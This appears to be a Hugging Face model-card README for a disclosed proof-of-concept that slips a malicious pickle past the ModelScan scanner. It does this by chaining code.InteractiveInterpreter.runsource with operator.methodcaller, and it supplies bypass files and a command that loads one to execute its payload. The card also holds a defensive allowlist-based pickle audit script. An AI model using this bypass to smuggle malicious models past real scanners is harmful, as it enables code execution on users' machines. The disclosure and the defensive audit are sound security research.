Upload README.md with huggingface_hub
0074a97 verified
---
tags:
  - modelscan
  - picklescan
  - bypass
  - rce
  - proof-of-concept
library_name: generic
---

# ModelScan Bypass PoC: code.InteractiveInterpreter.runsource() + operator.methodcaller()

## Overview

This is a proof-of-concept demonstrating a new bypass of ProtectAI ModelScan (v0.8.x), the model scanner used by HuggingFace to detect malicious pickle models.

## Bypass Mechanism

ModelScan rejects pickle GLOBAL opcodes that import from a denylist of known dangerous modules and callables (os, subprocess, pickle, builtins.eval, etc.), but code.InteractiveInterpreter and operator.methodcaller are not on that list, so a pickle importing only those two passes the scan.

The exploit chain:

```python
operator.methodcaller("runsource", PAYLOAD)(code.InteractiveInterpreter())
#   == code.InteractiveInterpreter().runsource(PAYLOAD)
#   == compile(PAYLOAD) + exec(PAYLOAD)
```
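The defensive lesson of the chain above is that a denylist of module names can always be extended around. The following is an added example (not code from this repository or from ModelScan) of an allowlist-based static audit: it walks the pickle opcode stream with `pickletools.genops`, which never executes anything, collects every `GLOBAL`, `INST` and `STACK_GLOBAL` import, and reports anything not on an explicit allowlist. `ALLOWED_IMPORTS`, the sample pickles and the function names are all constructed for this example; the suspect samples only pickle a reference to the class, contain no `REDUCE`, and are never loaded.

```python
"""Allowlist-based static audit of pickle imports (added example; not from the PoC).

pickletools.genops walks the opcode stream without executing it, so the file
is never loaded. Every GLOBAL / INST / STACK_GLOBAL import is collected and
anything not on an explicit allowlist is reported. A denylist (the approach
this bypass defeats) is deliberately not used.
"""
import code          # only used to construct the suspect samples below
import collections
import io
import pickle
import pickletools

# Hypothetical allowlist: the imports a loader for plain data models needs.
ALLOWED_IMPORTS = {("collections", "OrderedDict")}

STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
              "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}
# Opcodes that push nothing on the data stack; skipped when resolving STACK_GLOBAL.
TRANSPARENT_OPS = {"PROTO", "FRAME", "MEMOIZE", "PUT", "BINPUT", "LONG_BINPUT"}


def pickle_imports(data: bytes) -> set:
    """Return the set of (module, name) pairs the pickle would import."""
    imports = set()
    recent = []  # (kind, value) of the last two value-producing opcodes
    for op, arg, _pos in pickletools.genops(io.BytesIO(data)):
        if op.name in ("GLOBAL", "INST"):
            # pickletools renders the argument of both opcodes as "module name".
            module, name = arg.split(" ", 1)
            imports.add((module, name))
        elif op.name == "STACK_GLOBAL":
            if len(recent) == 2 and all(kind == "str" for kind, _ in recent):
                imports.add((recent[0][1], recent[1][1]))
            else:
                # Operands came from the memo (GET) or another opcode and cannot be
                # resolved statically; record that as a finding in its own right.
                imports.add(("<unresolved>", "<unresolved>"))
        if op.name in TRANSPARENT_OPS:
            continue
        recent.append(("str" if op.name in STRING_OPS else "other", arg))
        del recent[:-2]  # keep only the last two
    return imports


def audit(data: bytes, allowed=frozenset(ALLOWED_IMPORTS)) -> list:
    """Imports outside the allowlist, sorted; an empty list means clean."""
    return sorted(imp for imp in pickle_imports(data) if imp not in allowed)


# Constructed samples. SUSPECT_* pickle only a reference to the class the PoC
# abuses (no REDUCE), so loading them would merely return the class object;
# the audit flags them on the import alone, without loading anything.
BENIGN = pickle.dumps({"weights": [0.1, 0.2], "layers": 2}, protocol=4)
ALLOWED = pickle.dumps(collections.OrderedDict(a=1), protocol=4)
SUSPECT_P2 = pickle.dumps(code.InteractiveInterpreter, protocol=2)  # GLOBAL opcode
SUSPECT_P4 = pickle.dumps(code.InteractiveInterpreter, protocol=4)  # STACK_GLOBAL opcode

if __name__ == "__main__":
    for label, blob in [("benign", BENIGN), ("allowed", ALLOWED),
                        ("suspect-p2", SUSPECT_P2), ("suspect-p4", SUSPECT_P4)]:
        findings = audit(blob)
        print(f"{label:10s} {'CLEAN' if not findings else 'FLAGGED ' + str(findings)}")
```

The audit treats an unresolvable `STACK_GLOBAL` as a finding rather than ignoring it, so a pickle that fetches its module and attribute names from the memo instead of pushing them as literals is still rejected; the default of an allowlist scanner is to fail closed on anything it cannot prove.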

## Files

| File | Format | Description |
|------|--------|-------------|
| code_bypass.pkl | Pickle (v5) | Raw pickle file, 171 bytes |
| code_bypass.joblib | joblib | .joblib format, 298 bytes |

## Verification

```bash
# Install modelscan
pip install modelscan

# Scan - will report "No issues found"
modelscan --path code_bypass.pkl

# Execute - will run the payload
python -c "import pickle; pickle.load(open('code_bypass.pkl','rb'))"
```

## Disclosure

- Researcher: xiaoyaoes
- Date: 2026-06-18
- Status: Reported via Huntr MFV program